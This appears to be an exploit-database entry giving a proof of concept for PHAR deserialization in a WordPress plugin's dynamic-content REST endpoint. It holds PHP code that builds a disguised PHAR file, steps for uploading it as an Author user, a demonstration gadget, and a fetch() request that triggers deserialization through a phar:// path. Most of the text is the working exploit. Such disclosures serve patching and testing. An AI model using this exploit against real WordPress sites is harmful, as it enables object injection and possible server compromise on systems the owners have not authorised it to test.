## https://sploitus.com/exploit?id=WPEX-ID:93ACB4EE-1053-48E1-8B69-C09DC3B2F302
Please note that the following proof-of-concept requires WordPress to be running a PHP version previous to 8.0.
1. Create a PHAR file using the following PHP code in the `create_phar.php` file, and the command `php --define phar.readonly=0 create_phar.php`.
<?php
class Evil {}
// create new Phar
$phar = new Phar('poc.phar');
$phar->startBuffering();
$phar->addFromString('test.png', 'text');
$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
$phar->setMetadata(new Evil());
$phar->stopBuffering();
2. As an Author user, upload the `poc.phar.jpg` file. Note its path on the server (e.g. `/wp-content/uploads/2023/04/poc.phar_.jpg`).
3. Create a simulated gadget on the server with the following code:
class Evil {
function __wakeup() {
die('Arbitrary deserialization');
}
}
4. Trigger the deserialization with the following code in the browser console (with the correct path to the .phar file on your server):
fetch("/wp-json/otter/v1/dynamic?type=author&uid=1234&context=somecontext&fallback=phar://wp-content/uploads/2023/04/poc.phar_.jpg/test.txt")